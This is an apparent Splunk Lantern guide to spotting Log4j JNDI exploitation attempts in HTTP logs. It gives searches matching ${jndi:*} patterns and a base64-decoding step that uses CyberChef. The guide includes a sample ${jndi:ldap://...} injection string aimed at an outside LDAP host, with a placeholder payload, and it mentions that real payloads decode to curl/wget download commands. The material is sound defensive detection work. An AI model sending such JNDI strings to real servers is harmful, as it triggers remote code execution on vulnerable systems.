 
Splunk Lantern

Suspicious encoded strings

 

The vulnerability that attackers exploit lies in the JNDI lookup feature of the Log4j library, so the presence of JNDI lookup strings in logged request data is an indicator of attempted exploitation. You can run two types of searches to identify and understand these strings: a first-stage search for potentially suspicious activity indicated by the presence of ${jndi:ldap://, and a second search that uses CyberChef for Splunk or any base64 decoder to decode the payloads carried by the strings found in the first search.

Required data

Procedure

Step 1

Run the following search. You can optimize it by specifying an index and adjusting the time range.

sourcetype=bro:http:json user_agent=${jndi:*}
| stats sparkline values(user_agent) count BY src_ip, dest_ip, dest_port

Search explanation

The table provides an explanation of what each part of this search achieves.

Splunk Search / Explanation
Search: sourcetype=bro:http:json user_agent=${jndi:*}
Explanation: Search the bro:http:json sourcetype for events whose user_agent field contains the malicious lookup string ${jndi:.
Search: | stats sparkline values(user_agent) count BY src_ip, dest_ip, dest_port
Explanation: Return the results in a table with a sparkline, the event count and the distinct user_agent values, grouped by source IP, destination IP and destination port.

Result

This search looks for suspicious strings in the user_agent field. These strings can also appear in other fields, such as the URI or other request headers, so if a specific field cannot be isolated, an unstructured search such as this one will need to be run:

index=* ${jndi:*}

This search is not well-optimized, because it is an unstructured search across all indexes with a wildcard, but it is wide-ranging enough to ensure that nothing is missed. You can optimize it with constraints such as specific asset address ranges or device categorizations.

Using accelerated data models from the Splunk Common Information Model (CIM) is another way to optimize this search. For example, http_user_agent is a field in the Web data model and can be searched with tstats.

Positive results from this search do not mean you have been compromised. However, they confirm that attackers are looking for opportunities to breach or exploit your systems. Additional examination of the systems that are seeing this activity is required to determine whether a breach or exploitation has occurred. To understand the commands being sent, and to tell whether the activity is still just scanning or is exploitation, the encoded strings must be decoded and analyzed.

Step 2

You can use CyberChef for Splunk or any base64 decoder to better understand the behavior of strings found in the previous step.

Because this article should not contain strings that would actually scan or exploit a site, the real base64 payload has been replaced in the search below with a harmless placeholder. The Result section describes what a real decoded command looks like, so the search in this step, which you can copy and paste as-is, will decode to a different result.

Run the following search. You can optimize it by specifying an index and adjusting the time range.

| makeresults
| eval test="${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/U28gTG9uZywgYW5kIFRoYW5rcyBmb3IgQWxsIHRoZSBGaXNo}"
| rex field=test "\/Base64\/(?<string>\S+)}"
| table string
| cyberchef infield=string outfield=result operation=FromBase64

Search explanation

The table provides an explanation of what each part of this search achieves. You can adjust this query based on the specifics of your environment.

Splunk Search / Explanation
Search: | makeresults
Explanation: Create a temporary, dummy event.
Search: | eval test="${jndi:ldap://45.155.205.233:12344/Basic/Co...sIHRoZSBGaXNo}"
Explanation: Add a field named test holding the sample JNDI string, whose base64 payload follows /Base64/.
Search: | rex field=test "\/Base64\/(?<string>\S+)}"
Explanation: Extract everything between /Base64/ and the closing } of the test field into a new field named string.
Search: | table string
Explanation: Display the results in a table with columns in the order shown.
Search: | cyberchef infield=string outfield=result operation=FromBase64
Explanation: Pass the string field through the CyberChef for Splunk FromBase64 operation and write the decoded text to a field named result.

Result

Modify the above search to use the base64 strings observed in your own environment. In the example shown in the article's screenshot, decoding the base64 yields a curl statement with wget and associated IP addresses. Those IP addresses could go into your watchlists.

Next steps

Finally, you might be interested in other processes associated with the Detecting Log4j remote code execution use case.